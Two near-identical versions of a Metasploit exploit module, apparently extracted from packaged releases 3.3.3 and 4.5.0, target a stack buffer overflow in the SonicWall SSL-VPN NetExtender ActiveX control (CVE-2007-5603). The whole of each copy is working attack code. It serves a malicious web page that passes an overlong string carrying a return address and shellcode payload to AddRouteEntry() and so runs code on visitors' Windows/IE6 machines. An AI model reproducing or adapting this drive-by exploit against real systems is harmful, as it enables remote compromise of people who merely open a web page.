==> metasploit-3.3.3.tbz: share/metasploit/modules/exploits/windows/browser/sonicwall_addrouteentry.rb <==
##
# $Id: sonicwall_addrouteentry.rb 7724 2009-12-06 05:50:37Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::HttpServer::HTML

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'SonicWall SSL-VPN NetExtender ActiveX Control Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack overflow in SonicWall SSL-VPN NetExtender. 
					By sending an overly long string to the "AddRouteEntry()" method located 
					in the NELaunchX.dll (1.0.0.26) Control, an attacker may be able to execute 
					arbitrary code.
			},
			'License'        => MSF_LICENSE,
			'Author'         => [ 'MC' ], 
			'Version'        => '$Revision: 7724 $',
			'References'     => 
				[
					[ 'CVE', '2007-5603'],
					[ 'OSVDB', '39069'],
					[ 'URL', 'http://www.sec-consult.com/303.html' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'         => 800,
					'BadChars'      => "\x00\x09\x0a\x0d'\\",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'IE 6 / Windows XP SP2 Pro English',     { 'Ret' => 0x7e497c7b } ], # 11/01/07
				],
			'DisclosureDate' => 'Nov 1 2007',
			'DefaultTarget'  => 0))
	end

	def autofilter
			false
	end

	def check_dependencies
			use_zlib
	end

	def on_request_uri(cli, request)
		# Re-generate the payload
		return if ((p = regenerate_payload(cli)) == nil)

		# Randomize some things
		vname	= rand_text_alpha(rand(100) + 1)
		strname	= rand_text_alpha(rand(100) + 1)
		
		# Set the exploit buffer	
		sploit =  rand_text_english(36) + [target.ret].pack('V') 
		sploit << p.encoded + rand_text_english(1024 - p.encoded.length)
		
		# Build out the message
		content = %Q|
			<html>
			<object classid='clsid:6EEFD7B1-B26C-440D-B55A-1EC677189F30' id='#{vname}'></object>
			<script language='javascript'>
			var #{vname} = document.getElementById('#{vname}');
			var #{strname} = new String('#{sploit}');
			#{vname}.AddRouteEntry(#{strname}, #{vname});
			</script>
			</html>
                  |
		
		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")

		# Transmit the response to the client
		send_response_html(cli, content)
		
		# Handle the payload
		handler(cli)
	end

end

==> metasploit-4.5.0.tbz: share/metasploit/modules/exploits/windows/browser/sonicwall_addrouteentry.rb <==
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::HttpServer::HTML

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'SonicWall SSL-VPN NetExtender ActiveX Control Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in SonicWall SSL-VPN NetExtender.
				By sending an overly long string to the "AddRouteEntry()" method located
				in the NELaunchX.dll (1.0.0.26) Control, an attacker may be able to execute
				arbitrary code.
			},
			'License'        => MSF_LICENSE,
			'Author'         => [ 'MC' ],
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2007-5603'],
					[ 'OSVDB', '39069'],
					[ 'URL', 'http://www.sec-consult.com/303.html' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'         => 800,
					'BadChars'      => "\x00\x09\x0a\x0d'\\",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'IE 6 / Windows XP SP2 Pro English',     { 'Ret' => 0x7e497c7b } ], # 11/01/07
				],
			'DisclosureDate' => 'Nov 1 2007',
			'DefaultTarget'  => 0))
	end

	def autofilter
			false
	end

	def check_dependencies
			use_zlib
	end

	def on_request_uri(cli, request)
		# Re-generate the payload
		return if ((p = regenerate_payload(cli)) == nil)

		# Randomize some things
		vname	= rand_text_alpha(rand(100) + 1)
		strname	= rand_text_alpha(rand(100) + 1)

		# Set the exploit buffer
		sploit =  rand_text_english(36) + [target.ret].pack('V')
		sploit << p.encoded + rand_text_english(1024 - p.encoded.length)

		# Build out the message
		content = %Q|<html>
			<object classid='clsid:6EEFD7B1-B26C-440D-B55A-1EC677189F30' id='#{vname}'></object>
			<script language='javascript'>
			var #{vname} = document.getElementById('#{vname}');
			var #{strname} = new String('#{sploit}');
			#{vname}.AddRouteEntry(#{strname}, #{vname});
			</script>
			</html>
			|

		print_status("Sending #{self.name}")

		# Transmit the response to the client
		send_response_html(cli, content)

		# Handle the payload
		handler(cli)
	end

end
